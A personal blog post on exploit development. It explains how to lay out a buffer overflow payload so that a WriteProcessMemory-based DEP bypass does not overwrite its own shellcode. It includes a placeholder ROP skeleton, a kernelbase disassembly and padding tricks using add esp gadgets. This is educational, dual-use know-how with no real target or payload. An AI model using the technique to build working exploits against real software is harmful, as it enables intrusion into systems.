Bypassing DEP - Increasing the Gap

This blog talks about how to use WriteProcessMemory API Call for executing shellcode in a scenario where there is very less gap between shellcode and WriteProcessMemory call skeleton

In this blog, I have documented a yet another less known way to perform DEP Bypass using WriteProcessMemory API Call in a scenario where your shellcode is of large size but you have very less space for shellcode insertion. We will talk on how you can use part of ROP chain's space for your shellcode to make sure that during the WriteProcessMemory API Operation, there is no shellcode corruption.

The following is the function defination of WriteProcessMemory API Call :-

BOOL WriteProcessMemory(
  [in]  HANDLE  hProcess,
  [in]  LPVOID  lpBaseAddress,
  [in]  LPCVOID lpBuffer,
  [in]  SIZE_T  nSize,
  [out] SIZE_T  *lpNumberOfBytesWritten

WriteProcessMemory API Call takes 5 arguments. First one being the handle to Process which indicates the handle of process where lpBuffer needs to be written. This defaults to -1 for current process. Next is lpBaseAddress which is basically the destination address for copying bytes. Next we have lpBuffer which is source address i.e address from where bytes will be copied from. Next we have nSize which is the number of bytes to be copied. Finally we have lpNumberOfBytesWritten which indicates address where WriteProcessMemory will write the number of bytes it was able to successfully copy. This address must be writeable.

Vulnerable Application

Moving, on lets assume a scenario where an application is vulnerable to Buffer overflow. Now, the EIP overwrite happens at say 451th byte in Input buffer and the total bytes that needs to be sent to trigger the overflow are 750 bytes. In such case input would look like below :-

Input buffer = "A"*450 + "B"*4 + "C"*(750-430-4)

In this case, once we send the above input to vulnerable application, it would overwrite the EIP with 0x42424242 and crash the program. We also verify that application is compiled with DEP protection and hence would involve ROP chains to execute shellcode.

Let's assume that our shellcode is of size 410 bytes. In such case, we would be sending shellcode along with As. Now, the input would look like below :-

Input buffer = shellcode + "A"*(450-410) + "B"*4 + "C"*316

Now, let's create the skeleton for WriteProcessMemory API Call.

wp = struct.pack("<L",0x45454545)    # Address of IAT entry containing WriteProcessMemory
wp += struct.pack("<L",0x46464646)   # Return address after executing WriteProcessMemory
wp += struct.pack("<L",0xffffffff)   # Value of hProcess
wp += struct.pack("<L",0x47474747)   # Value of lpBaseAddress
wp += struct.pack("<L",0x48484848)   # Value of lpBuffer
wp += struct.pack("<L",0x49494949)   # Value of nSize 
wp += struct.pack("<L",0x50505050)   # Value of lpNumberOfBytesWritten

Now, the input would look something like below (Size of wp is 28) :-

Input buffer = shellcode + "A"*12 + wp + EIP + <ROP Chain>

A question to readers, does the above input structure looks safe in context of shellcode corruption, when we write ROP chains to make EIP point to start of wp after patching wp at runtime via ROP Chains?

If you answered NO, then great work. You identified a potential Rabbit hole and saved yourself some time.

Well, if you answered YES, then you just dropped into a rabbit hole like me :) . Let's talk why.

Journey down the Rabbit Hole

To understand the issue, lets deep dive into assembly of WriteProcessMemory Function.

0:002> u kernelbase!WriteProcessMemory L50
755f3990 8bff            mov     edi,edi
755f3992 55              push    ebp
755f3993 8bec            mov     ebp,esp
755f3995 83ec30          sub     esp,30h
755f3998 53              push    ebx
755f3999 57              push    edi
755f399a 33db            xor     ebx,ebx
755f399c 8d45d0          lea     eax,[ebp-30h]
755f399f 53              push    ebx
755f39a0 6a1c            push    1Ch
755f39a2 50              push    eax
755f39a3 6a08            push    8
755f39a5 ff750c          push    dword ptr [ebp+0Ch]
755f39a8 895df8          mov     dword ptr [ebp-8],ebx
755f39ab ff7508          push    dword ptr [ebp+8]
755f39ae 895df4          mov     dword ptr [ebp-0Ch],ebx
755f39b1 895dfc          mov     dword ptr [ebp-4],ebx
755f39b4 ff1548046975    call    dword ptr [KERNELBASE!imp_NtQueryVirtualMemory (75690448)]
755f39ba 8bc8            mov     ecx,eax
755f39bc 85c9            test    ecx,ecx

Lets skim through the WriteProcessMemory method in kernelbase. As shown above we see a sub esp, 30 instruction which is basically allocating stack for WriteProcessMemory's operations. The function's prolouge is followed by multiple push statements which are performing stack operations.

Recall that our input buffer was of format

input buffer = shellcode + "A" * 12 + wp + EIP + ROP

Moment EIP reaches the start of wp after executing our ROP Gadgets, it would jump directly into WriteProcessMemory function. To help understand, lets assume that the address of wp's start is 0x5000000 . The input looks something like this in address space :-

0x4fffe66    <start of shellcode>
    .          .
0x4ffffd0    <DWORD inside shellcode>
    .          .
0x4fffff3    <last byte of shellcode>
0x4fffff4    0x41
0x4fffff5    0x41
    .          .
    .          .
0x4ffffff    0x41
0x5000000    <start of wp>    -> ESP Pointing here

Now, before executing WriteProcessMemory API Call, ESP would be pointing to start of wp (Read basics of ROP Chains on why). When it starts the execution of WriteProcessMemory ESP still points at same address. Now when EIP reaches address 0x755f3995 in WriteProcessMemory, ESP still points to 0x5000000. Now, moment EIP executes 0x755f3995, i.e sub esp,30 makes ESP = 0x4ffffd0. As you might have guessed, this is where problem starts.

Since there is not enough space between end of shellcode and start of wp, ESP ended up pointing inside our shellcode. Subsequent push instructions will go and corrupt our shellcode failing our exploit.

Now, that we understood the rabbit hole, lets find a way out.

Getting out of Rabbit Hole

The basic idea is to increase the space between end of shellcode and start of wp so that ESP does't end up inside our shellcode. We can do something interesting over here.

Suggested input structure :-

Input buffer = shellcode + "A"*12 + EIP + <dummy instructions to increase gap between shellcode and wp> + wp + rop

The above proposed input structure basically uses dummy instructions to increase gap between shellcode and wp. We can use gadgets like xor eax,eax or any non-destructive instructions to increase this gap. But this come's with a trade off. It ends up eating our space for ROP Chains. The greater the number of dummy instructions, the less space left for ROP Chain.

One trick to smartly workaround this is to use instructions like add esp,0x20 which instead of using dummy instruction, adds esp right away increasing the gap between shellcode and ESP. This would require less dummy instructions and can help us land right into ROP Chains. With proper stack alignment this can be used to make EIP point to start of our ROP chains rather than somewhere in between.


This trick was discovered by me during my learning process. I have not come across much blogs explaining the workaround the size restrictions so thought it might be a good idea to share this with community. Contact me on Twitter for any feedbacks.


Last updated